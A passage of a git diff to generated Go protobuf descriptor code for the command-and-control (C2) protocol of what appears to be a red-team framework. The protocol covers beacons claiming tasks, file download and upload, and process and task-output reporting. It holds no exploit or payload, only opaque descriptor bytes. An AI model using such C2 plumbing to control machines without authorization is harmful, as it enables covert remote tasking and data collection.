func (*ReportTaskOutputResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{16} + return file_c2_proto_rawDescGZIP(), []int{15} } var File_c2_proto protoreflect.FileDescriptor @@ -1193,7 +936,8 @@ var File_c2_proto protoreflect.FileDescriptor var file_c2_proto_rawDesc = []byte{ 0x0a, 0x08, 0x63, 0x32, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x02, 0x63, 0x32, 0x1a, 0x1f, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2f, - 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, + 0x74, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x1a, + 0x0e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x22, 0x27, 0x0a, 0x05, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x0a, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0a, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x66, 0x69, 0x65, 0x72, 0x22, 0xa1, 0x01, 0x0a, 0x06, 0x42, 0x65, 0x61, @@ -1222,138 +966,88 @@ var file_c2_proto_rawDesc = []byte{ 0x53, 0x10, 0x01, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4c, 0x49, 0x4e, 0x55, 0x58, 0x10, 0x02, 0x12, 0x12, 0x0a, 0x0e, 0x50, 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x4d, 0x41, 0x43, 0x4f, 0x53, 0x10, 0x03, 0x12, 0x10, 0x0a, 0x0c, 0x50, - 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, 0x10, 0x04, 0x22, 0x85, 0x04, - 0x0a, 0x07, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x12, 0x10, 0x0a, 0x03, 0x70, 0x69, 0x64, - 0x18, 0x01, 0x20, 0x01, 0x28, 0x04, 0x52, 0x03, 0x70, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x70, - 0x70, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x04, 0x52, 0x04, 0x70, 0x70, 0x69, 0x64, 0x12, - 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, - 0x61, 0x6d, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, - 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, - 0x6c, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x6d, 0x64, 0x18, 0x06, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x03, 0x63, 0x6d, 0x64, 0x12, 0x10, 0x0a, 0x03, 0x65, 0x6e, 0x76, 0x18, 0x07, - 0x20, 0x01, 0x28, 0x09, 0x52, 
0x03, 0x65, 0x6e, 0x76, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x77, 0x64, - 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x63, 0x77, 0x64, 0x12, 0x2a, 0x0a, 0x06, 0x73, - 0x74, 0x61, 0x74, 0x75, 0x73, 0x18, 0x09, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x12, 0x2e, 0x63, 0x32, - 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x2e, 0x53, 0x74, 0x61, 0x74, 0x75, 0x73, 0x52, - 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x22, 0xab, 0x02, 0x0a, 0x06, 0x53, 0x74, 0x61, 0x74, - 0x75, 0x73, 0x12, 0x16, 0x0a, 0x12, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x53, - 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, - 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x4b, 0x4e, 0x4f, 0x57, 0x4e, 0x10, 0x01, 0x12, 0x0f, - 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x49, 0x44, 0x4c, 0x45, 0x10, 0x02, 0x12, - 0x0e, 0x0a, 0x0a, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x52, 0x55, 0x4e, 0x10, 0x03, 0x12, - 0x10, 0x0a, 0x0c, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x53, 0x4c, 0x45, 0x45, 0x50, 0x10, - 0x04, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x53, 0x54, 0x4f, 0x50, - 0x10, 0x05, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x5a, 0x4f, 0x4d, - 0x42, 0x49, 0x45, 0x10, 0x06, 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, - 0x54, 0x52, 0x41, 0x43, 0x49, 0x4e, 0x47, 0x10, 0x07, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, - 0x54, 0x55, 0x53, 0x5f, 0x44, 0x45, 0x41, 0x44, 0x10, 0x08, 0x12, 0x14, 0x0a, 0x10, 0x53, 0x54, - 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x45, 0x5f, 0x4b, 0x49, 0x4c, 0x4c, 0x10, 0x09, - 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x49, 0x4e, - 0x47, 0x10, 0x0a, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x50, 0x41, - 0x52, 0x4b, 0x45, 0x44, 0x10, 0x0b, 0x12, 0x17, 0x0a, 0x13, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, - 0x5f, 0x4c, 0x4f, 0x43, 0x4b, 0x5f, 0x42, 0x4c, 0x4f, 0x43, 0x4b, 0x45, 0x44, 0x10, 0x0c, 0x12, - 0x24, 0x0a, 0x20, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x49, 0x4e, 0x54, 0x45, - 0x52, 0x55, 0x50, 0x54, 0x49, 0x42, 0x4c, 0x45, 0x5f, 0x44, 0x49, 0x53, 0x4b, 0x5f, 0x53, 0x4c, - 0x45, 0x45, 0x50, 0x10, 0x0d, 0x22, 0xe9, 0x01, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, - 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x1a, - 0x0a, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, - 0x52, 0x08, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x12, 0x38, 0x0a, 0x0a, 0x70, 0x61, - 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, 0x18, 0x03, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x18, - 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x2e, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, - 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, 0x79, 0x52, 0x0a, 0x70, 0x61, 0x72, 0x61, 0x6d, 0x65, - 0x74, 0x65, 0x72, 0x73, 0x12, 0x1d, 0x0a, 0x0a, 0x66, 0x69, 0x6c, 0x65, 0x5f, 0x6e, 0x61, 0x6d, - 0x65, 0x73, 0x18, 0x04, 0x20, 0x03, 0x28, 0x09, 0x52, 0x09, 0x66, 0x69, 0x6c, 0x65, 0x4e, 0x61, - 0x6d, 0x65, 0x73, 0x12, 0x1d, 0x0a, 0x0a, 0x71, 0x75, 0x65, 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, - 0x65, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x71, 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, - 0x6d, 0x65, 0x1a, 0x3d, 0x0a, 0x0f, 0x50, 0x61, 0x72, 0x61, 0x6d, 0x65, 0x74, 0x65, 0x72, 0x73, - 0x45, 0x6e, 0x74, 0x72, 0x79, 0x12, 0x10, 0x0a, 0x03, 0x6b, 0x65, 0x79, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x03, 0x6b, 0x65, 0x79, 0x12, 0x14, 
0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, - 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38, - 0x01, 0x22, 0x1d, 0x0a, 0x09, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, - 0x0a, 0x03, 0x6d, 0x73, 0x67, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, - 0x22, 0xe3, 0x01, 0x0a, 0x0a, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, - 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, - 0x16, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x23, 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, - 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0d, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, - 0x45, 0x72, 0x72, 0x6f, 0x72, 0x52, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, - 0x65, 0x78, 0x65, 0x63, 0x5f, 0x73, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, - 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, - 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, - 0x70, 0x52, 0x0d, 0x65, 0x78, 0x65, 0x63, 0x53, 0x74, 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, - 0x12, 0x44, 0x0a, 0x10, 0x65, 0x78, 0x65, 0x63, 0x5f, 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, - 0x64, 0x5f, 0x61, 0x74, 0x18, 0x05, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, - 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, - 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0e, 0x65, 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, - 0x73, 0x68, 0x65, 0x64, 0x41, 0x74, 0x22, 0x37, 0x0a, 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, - 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, - 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, - 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x52, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, - 0x34, 0x0a, 0x12, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, - 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x1e, 0x0a, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, - 0x20, 0x03, 0x28, 0x0b, 0x32, 0x08, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, - 0x74, 0x61, 0x73, 0x6b, 0x73, 0x22, 0x29, 0x0a, 0x13, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, - 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, - 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, - 0x22, 0x2c, 0x0a, 0x14, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, - 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, - 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0xdc, - 0x01, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, - 0x75, 0x65, 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, - 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x12, 0x0a, - 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, - 0x68, 0x12, 0x14, 0x0a, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, - 0x52, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x12, 0x14, 0x0a, 0x05, 0x67, 0x72, 
0x6f, 0x75, 0x70, - 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x12, 0x20, 0x0a, - 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x18, 0x05, 0x20, 0x01, - 0x28, 0x09, 0x52, 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, - 0x12, 0x0a, 0x04, 0x73, 0x69, 0x7a, 0x65, 0x18, 0x06, 0x20, 0x01, 0x28, 0x03, 0x52, 0x04, 0x73, - 0x69, 0x7a, 0x65, 0x12, 0x22, 0x0a, 0x0d, 0x73, 0x68, 0x61, 0x33, 0x5f, 0x32, 0x35, 0x36, 0x5f, - 0x68, 0x61, 0x73, 0x68, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x73, 0x68, 0x61, 0x33, - 0x32, 0x35, 0x36, 0x48, 0x61, 0x73, 0x68, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, - 0x18, 0x08, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x14, 0x0a, - 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, - 0x6e, 0x73, 0x65, 0x22, 0x54, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, - 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, - 0x1f, 0x0a, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x0b, 0x2e, - 0x63, 0x32, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, - 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, - 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, - 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x26, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, - 0x0b, 0x32, 0x0e, 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, - 0x74, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, - 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x32, 0xea, 0x02, 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, 0x0a, - 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, - 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, - 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x43, 0x0a, 0x0c, 0x44, - 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x17, 0x2e, 0x63, 0x32, - 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, - 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, - 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, - 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, - 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, - 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, - 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, - 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, - 0x4c, 
0x69, 0x73, 0x74, 0x12, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, - 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, - 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, - 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, - 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, - 0x22, 0x00, 0x42, 0x2e, 0x5a, 0x2c, 0x67, 0x69, 0x74, 0x68, 0x75, 0x62, 0x2e, 0x63, 0x6f, 0x6d, - 0x2f, 0x6b, 0x63, 0x61, 0x72, 0x72, 0x65, 0x74, 0x74, 0x6f, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, - 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, - 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, + 0x4c, 0x41, 0x54, 0x46, 0x4f, 0x52, 0x4d, 0x5f, 0x42, 0x53, 0x44, 0x10, 0x04, 0x22, 0x59, 0x0a, + 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x22, 0x0a, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x18, 0x02, 0x20, + 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x54, + 0x6f, 0x6d, 0x65, 0x52, 0x04, 0x74, 0x6f, 0x6d, 0x65, 0x12, 0x1d, 0x0a, 0x0a, 0x71, 0x75, 0x65, + 0x73, 0x74, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x71, + 0x75, 0x65, 0x73, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x1d, 0x0a, 0x09, 0x54, 0x61, 0x73, 0x6b, + 0x45, 0x72, 0x72, 0x6f, 0x72, 0x12, 0x10, 0x0a, 0x03, 0x6d, 0x73, 0x67, 0x18, 0x01, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x03, 0x6d, 0x73, 0x67, 0x22, 0xe3, 0x01, 0x0a, 0x0a, 0x54, 0x61, 0x73, 0x6b, + 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, + 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x16, 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, + 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, 0x23, + 0x0a, 0x05, 0x65, 0x72, 0x72, 0x6f, 0x72, 0x18, 0x03, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0d, 0x2e, + 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x45, 0x72, 0x72, 0x6f, 0x72, 0x52, 0x05, 0x65, 0x72, + 0x72, 0x6f, 0x72, 0x12, 0x42, 0x0a, 0x0f, 0x65, 0x78, 0x65, 0x63, 0x5f, 0x73, 0x74, 0x61, 0x72, + 0x74, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x1a, 0x2e, 0x67, + 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x62, 0x75, 0x66, 0x2e, 0x54, + 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0d, 0x65, 0x78, 0x65, 0x63, 0x53, 0x74, + 0x61, 0x72, 0x74, 0x65, 0x64, 0x41, 0x74, 0x12, 0x44, 0x0a, 0x10, 0x65, 0x78, 0x65, 0x63, 0x5f, + 0x66, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x5f, 0x61, 0x74, 0x18, 0x05, 0x20, 0x01, 0x28, + 0x0b, 0x32, 0x1a, 0x2e, 0x67, 0x6f, 0x6f, 0x67, 0x6c, 0x65, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, + 0x62, 0x75, 0x66, 0x2e, 0x54, 0x69, 0x6d, 0x65, 0x73, 0x74, 0x61, 0x6d, 0x70, 0x52, 0x0e, 0x65, + 0x78, 0x65, 0x63, 0x46, 0x69, 0x6e, 0x69, 0x73, 0x68, 0x65, 0x64, 0x41, 0x74, 0x22, 0x37, 0x0a, + 0x11, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 
0x52, 0x65, 0x71, 0x75, 0x65, + 0x73, 0x74, 0x12, 0x22, 0x0a, 0x06, 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x18, 0x01, 0x20, 0x01, + 0x28, 0x0b, 0x32, 0x0a, 0x2e, 0x63, 0x32, 0x2e, 0x42, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x52, 0x06, + 0x62, 0x65, 0x61, 0x63, 0x6f, 0x6e, 0x22, 0x34, 0x0a, 0x12, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, + 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x1e, 0x0a, 0x05, + 0x74, 0x61, 0x73, 0x6b, 0x73, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x08, 0x2e, 0x63, 0x32, + 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x52, 0x05, 0x74, 0x61, 0x73, 0x6b, 0x73, 0x22, 0x29, 0x0a, 0x13, + 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, + 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 